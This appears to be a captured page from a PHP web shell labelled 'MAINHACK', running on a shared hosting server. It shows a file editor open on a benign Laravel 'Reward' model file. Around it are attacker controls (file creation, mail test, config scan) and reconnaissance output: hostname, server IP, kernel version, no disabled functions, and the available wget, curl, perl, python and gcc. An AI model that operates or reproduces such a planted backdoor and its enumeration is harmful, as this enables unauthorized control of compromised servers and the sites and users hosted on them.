[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: Reward.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; class Reward extends Model { public $timestamps = false; protected $table = 'rewards'; protected $guarded = ['id']; const ACCOUNT_CHARGE = 'account_charge'; const CREATE_CLASSES = 'create_classes'; const BUY = 'buy'; const PASS_THE_QUIZ = 'pass_the_quiz'; const CERTIFICATE = 'certificate'; const COMMENT = 'comment'; const REGISTER = 'register'; const REVIEW_COURSES = 'review_courses'; const INSTRUCTOR_MEETING_RESERVE = 'instructor_meeting_reserve'; const STUDENT_MEETING_RESERVE = 'student_meeting_reserve'; const NEWSLETTERS = 'newsletters'; const BADGE = 'badge'; const REFERRAL = 'referral'; const LEARNING_PROGRESS_100 = 'learning_progress_100'; const CHARGE_WALLET = 'charge_wallet'; const BUY_STORE_PRODUCT = 'buy_store_product'; const PASS_ASSIGNMENT = 'pass_assignment'; const MAKE_TOPIC = 'make_topic'; const SEND_TOPIC_POST = 'send_post_in_topic'; const CREATE_BLOG_BY_INSTRUCTOR = 'create_blog_by_instructor'; const COMMENT_FOR_INSTRUCTOR_BLOG = 'comment_for_instructor_blog'; public static function getTypesLists(): array { return [ self::ACCOUNT_CHARGE, self::CREATE_CLASSES, self::BUY, self::PASS_THE_QUIZ, self::CERTIFICATE, self::COMMENT, self::REGISTER, self::REVIEW_COURSES, self::INSTRUCTOR_MEETING_RESERVE, self::STUDENT_MEETING_RESERVE, self::NEWSLETTERS, self::BADGE, self::REFERRAL, self::LEARNING_PROGRESS_100, self::CHARGE_WALLET, self::BUY_STORE_PRODUCT, self::PASS_ASSIGNMENT, self::MAKE_TOPIC, self::SEND_TOPIC_POST, self::CREATE_BLOG_BY_INSTRUCTOR, self::COMMENT_FOR_INSTRUCTOR_BLOG, ]; } }
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.86 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285